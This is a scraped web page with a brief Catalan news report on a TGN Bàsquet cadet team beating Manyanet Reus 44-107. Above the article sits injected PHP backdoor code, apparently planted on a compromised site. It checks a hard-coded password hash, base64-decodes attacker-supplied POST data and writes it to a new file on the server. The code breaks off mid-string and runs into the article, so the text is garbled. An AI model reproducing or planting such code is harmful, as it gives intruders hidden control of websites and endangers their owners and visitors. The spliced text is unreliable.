function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí 04 A fa una bona pressió defensiva i derrota el Manyanet Reus (44-107) - Tgn Bàsquet Club -

El cadet masculí 04 A fa una bona pressió defensiva i derrota el Manyanet Reus (44-107)

Updated: desembre 18, 2018

L’equip cadet masculí 04 A va derrotar el Manyanet Reus en un partit on els liles van ser molt superiors des de la defensa. El TGN Bàsquet va estar molt atent en la pressió defensiva, un fet que li va permetre recuperar moltes pilotes i marcar diferències des de ben aviat (10-36 al primer quart). La bona primera meitat (17-62 al descans), va deixar el partit sentenciat.